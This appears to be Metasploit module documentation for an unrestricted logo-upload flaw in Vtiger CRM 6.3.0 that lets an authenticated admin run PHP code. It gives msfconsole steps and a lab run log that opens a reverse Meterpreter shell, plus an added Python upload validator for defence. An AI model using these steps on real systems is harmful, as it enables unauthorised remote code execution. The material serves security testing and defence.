## Description
Vtiger v6.3.0 CRM's administration interface allows for the upload of a company logo.
The logo upload is an unrestricted file upload and can be used to upload PHP code,
which can then be executed by requesting the uploaded file's location.
## Vulnerable Application
[Vtiger v6.3.0](https://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.3.0/Core%20Product/)
## Options
**PHPSHORTTAG**
Specify the use of the PHP short tag, `<? `, for wrapping the payload.
Default: true
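
A server-side check of the kind the logo upload described above lacks, as an added example (not code from Vtiger or from the Metasploit module). It rejects script extensions, requires image magic bytes, and scans for PHP open tags, including the short tag `<?` that the PHPSHORTTAG option selects. The allow-list, the extension pattern and the name `check_logo_upload` are assumptions.

```python
import re

# Assumption: the logo types a deployment accepts, with their magic bytes.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions commonly mapped to the PHP handler. Matched anywhere in the name,
# so "logo.php.png" is rejected as well as "x.php".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
# Long tag "<?php", echo tag "<?=", and short tag "<?" followed by whitespace.
# "<?xml" is deliberately not matched.
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)


def check_logo_upload(filename, data):
    """Return (accepted, reason) for an uploaded logo file."""
    # Keep only the final path component, whatever separator the client sent.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()
    if not name or "\x00" in name:
        return False, "bad filename"
    if SCRIPT_EXT.search(name):
        return False, "script extension in filename"
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    if ext not in ALLOWED:
        return False, "extension not allow-listed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # Catches image/PHP polyglots: valid header, script appended or embedded.
    if PHP_TAG.search(data):
        return False, "PHP open tag in content"
    return True, "ok"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n\x00\x00IHDR"  # constructed sample header
    samples = [  # constructed inputs, not captured traffic
        ("KpXAXQNKjN.php", b"<?php echo 1; ?>"),
        ("logo.png", b"<? echo 1; ?>"),
        ("logo.png", png + b"<? echo 1; ?>"),
        ("logo.png", png),
    ]
    for fname, body in samples:
        print(fname, check_logo_upload(fname, body))
```

The tag scan can occasionally reject a legitimate image whose compressed bytes happen to contain `<?` plus whitespace; re-encoding the image server-side and serving uploads from a directory with no script handler are the stronger controls.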
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/http/vtiger_logo_upload_exec`
3. `set rhosts <rhost>`
4. `set password <password>`
5. `run`
## Scenarios
### VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10)
```
msf5 > use exploit/multi/http/vtiger_logo_upload_exec
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899
rport => 8899
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin
password => admin
msf5 exploit(multi/http/vtiger_logo_upload_exec) > run
[*] Started reverse TCP handler on 172.22.222.121:4444
[*] Uploading payload: KpXAXQNKjN.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:50295) at 2018-07-30 11:53:50 -0500
[+] Deleted KpXAXQNKjN.php
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows NT MSEDGEWIN10 6.2 build 9200 (Unknow Windows version Enterprise Edition) i586
Meterpreter : php/windows
meterpreter >
```